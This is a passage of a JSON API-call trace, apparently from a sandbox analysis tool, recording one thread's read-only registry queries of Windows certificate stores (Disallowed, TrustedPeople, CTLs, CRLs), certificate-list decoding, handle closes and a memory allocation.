"\\x03\\x00\\x00\\x00\\x01\\x00\\x01\\x00\\x14\\x00\\x00\\x00't\\x81H\\xbb\\xe6zC\\xcd\\xbf\\xecl7\\x84\\x86,\\xe14\\xe6\\xea\"\\x00\\x00\\x00\\x01\\x00\\x01\\x00*\\x02\\x00\\x000\\x82\\x02&\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x07\\x02\\xa0\\x82\\x02\\x170\\x82\\x02\\x13\\x02\\x01\\x011\\x000\\x82\\x02\\x08\\x06\t+\\x06\\x01\\x04\\x01\\x827\n\\x01\\xa0\\x82\\x01\\xf90\\x82\\x01\\xf50\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03\\x1e\\x04(D\\x00i\\x00s\\x00a\\x00l\\x00l\\x00o\\x00w\\x00e\\x00d\\x00C\\x00e\\x00r\\x00t\\x00_\\x00O\\x00S\\x00_\\x001\\x00\\x00\\x00\\x02\\x08\\x01\\xcd??\\xac\\xc3\\xee\\x89\\x17\r120531151137Z0\\x0e\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x0b\\x0f\\x05\\x000\\x82\\x01\\x900\\x12\\x04\\x10%\\xfbz]\\x86\\xf7/^g(\\x8fys\\x05\\xfe\\x940\\x12\\x04\\x10o-Ce\\xc1\\x02\\x1f[\\x8bc\\xef\\x13+\\xc3\\xb3`0\\x12\\x04\\x10\\xad\\x11\\xdb\\xb7l\\x9c\\xf1\\xab\\x99\\x98\\xcd\\x84.\\xc1vs0\\x12\\x04\\x10\\xdf\\xbd\\xd7/\\x99\\xc3\\xb6Jy~Z\\xc9mY\\xbeV0\\x12\\x04\\x10\\xc6h\\x15K\\xe9^\\x16\\xad\\xbc2\\x1a\\xbc1n8J0\\x12\\x04\\x1079.\\x83=\\xc6\\x05\\xdd{8$G9\\x93\\x9e\\xe30\\x12\\x04\\x101y\\xfeKW&\\xd8\\xdb*\\xaf=\\xf9X\\xc9k\\x970\\x12\\x04\\x10\\xc3Z\\x97\\xc8\\x0fh}\\xc3\\xc1\\x08\\xc6\\xa33\\x9bhF0\\x12\\x04\\x10!\\x18\\xa4\\xc6\\xf7\\x18\\xcf\\xc7\\xd6\\xd8x\\x8cSt\\xd3)0\\x12\\x04\\x10Rj9\\xc0M\\x15\\x86-B\\x7f\\xd9%\\xaf\\x036\\x900\\x12\\x04\\x10<6\\xe1h\\xab\\xcc\\x85\\x96c\\xedG\\xa0\\xc0Z\\xeey0\\x12\\x04\\x10\\x01\\x9e}V\\xd6\r\\xb9\\xad\\xec@\\xb9g\\xb1\\xbc\\xba\\x9f0\\x12\\x04\\x106\\xcd\\xe9\\x9a\\xb8s\\x7f\\x86(|X7\\x04\\xc9^\\x160\\x12\\x04\\x10&\\x99\nwX~\\xd8d\\x01\\x84\\xc4\\x93f\\xac\\xb0u0\\x12\\x04\\x10\\xf6\\x9d\"\\xae\\x1e\\xd6\\x15\\xb1\\xb9\\xe3\\x90\\xe3\\x10\\xbb\\xbb10\\x12\\x04\\x10\\xeb\\xe9\n\\xd1\\x01\\xd3\\x80+\\x8aL\\x91<" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs\\27748148BBE67A43CDBFEC6C3784862CE134E6EA\\Blob" + } + ], + "repeated": 0, + "id": 2395 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f2b77", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000658" + } + ], + "repeated": 0, + "id": 2396 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x767f770e", + "parentcaller": "0x76800725", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x800\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03\\x1e\\x04(D\\x00i\\x00s\\x00a\\x00l\\x00l\\x00o\\x00w\\x00e\\x00d\\x00C\\x00e\\x00r\\x00t\\x00_\\x00O\\x00S\\x00_\\x001\\x00\\x00\\x00\\x02\\x08\\x01\\xcd??\\xac\\xc3\\xee\\x89\\x17\r120531151137Z0\\x0e\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x0b\\x0f\\x05\\x00\\x00\\x00" + }, + { + "name": "Flags", + "value": "0x00008004" + } + ], + "repeated": 0, + "id": 2397 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000654" + } + ], + "repeated": 0, + "id": 2398 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2399 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000658" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed" + } + ], + "repeated": 0, + "id": 2400 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000065c" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000658" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates" + } + ], + "repeated": 0, + "id": 2401 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000065c" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2402 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000065c" + } + ], + "repeated": 0, + "id": 2403 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000065c" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000658" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs" + } + ], + "repeated": 0, + "id": 2404 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000065c" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2405 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000065c" + } + ], + "repeated": 0, + "id": 2406 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000065c" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000658" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs" + } + ], + "repeated": 0, + "id": 2407 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000065c" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2408 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000065c" + } + ], + "repeated": 0, + "id": 2409 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767e8258", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000658" + } + ], + "repeated": 0, + "id": 2410 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x0056c000" + }, + { + "name": "RegionSize", + "value": "0x00003000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2411 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000664" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000052c" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates" + } + ], + "repeated": 0, + "id": 2412 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000664" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2413 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000664" + } + ], + "repeated": 0, + "id": 2414 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000664" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000052c" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs" + } + ], + "repeated": 0, + "id": 2415 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000664" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2416 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000664" + } + ], + "repeated": 0, + "id": 2417 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000664" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000052c" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs" + } + ], + "repeated": 0, + "id": 2418 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000664" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2419 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000664" + } + ], + "repeated": 0, + "id": 2420 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000670" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000054c" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\TrustedPeople\\Certificates" + } + ], + "repeated": 0, + "id": 2421 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000670" + }, + { + "name": "KeyInformation", + "value": "\\x1fi\\xffcb\\xfff4\\x0e~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2422 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000670" + } + ], + "repeated": 0, + "id": 2423 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000670" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000054c" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\TrustedPeople\\CRLs" + } + ], + "repeated": 0, + "id": 2424 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000670" + }, + { + "name": "KeyInformation", + "value": "\\x1fi\\xffcb\\xfff4\\x0e~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2425 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000670" + } + ], + "repeated": 0, + "id": 2426 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000670" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000054c" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\TrustedPeople\\CTLs" + } + ], + "repeated": 0, + "id": 2427 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000670" + }, + { + "name": "KeyInformation", + "value": "\\x1fi\\xffcb\\xfff4\\x0e~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2428 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000670" + } + ], + "repeated": 0, + "id": 2429 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000674" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000540" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Policies\\Microsoft\\SystemCertificates\\TrustedPeople" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\SystemCertificates\\TrustedPeople" + } + ], + "repeated": 0, + "id": 2430 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000678" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000674" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\TrustedPeople\\Certificates" + } + ], + "repeated": 0, + "id": 2431 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000678" + }, + { + "name": "KeyInformation", + "value": "\\xff91\\xffe05\\x04\\x11~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2432 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000678" + } + ], + "repeated": 0, + "id": 2433 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000678" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000674" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\TrustedPeople\\CRLs" + } + ], + "repeated": 0, + "id": 2434 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000678" + }, + { + "name": "KeyInformation", + "value": "\\xff91\\xffe05\\x04\\x11~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2435 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000678" + } + ], + "repeated": 0, + "id": 2436 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000678" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000674" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\TrustedPeople\\CTLs" + } + ], + "repeated": 0, + "id": 2437 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000678" + }, + { + "name": "KeyInformation", + "value": "\\xff91\\xffe05\\x04\\x11~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2438 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000678" + } + ], + "repeated": 0, + "id": 2439 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767e8258", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000674" + } + ], + "repeated": 0, + "id": 2440 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000680" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000554" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\TrustedPeople\\Certificates" + } + ], + "repeated": 0, + "id": 2441 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + 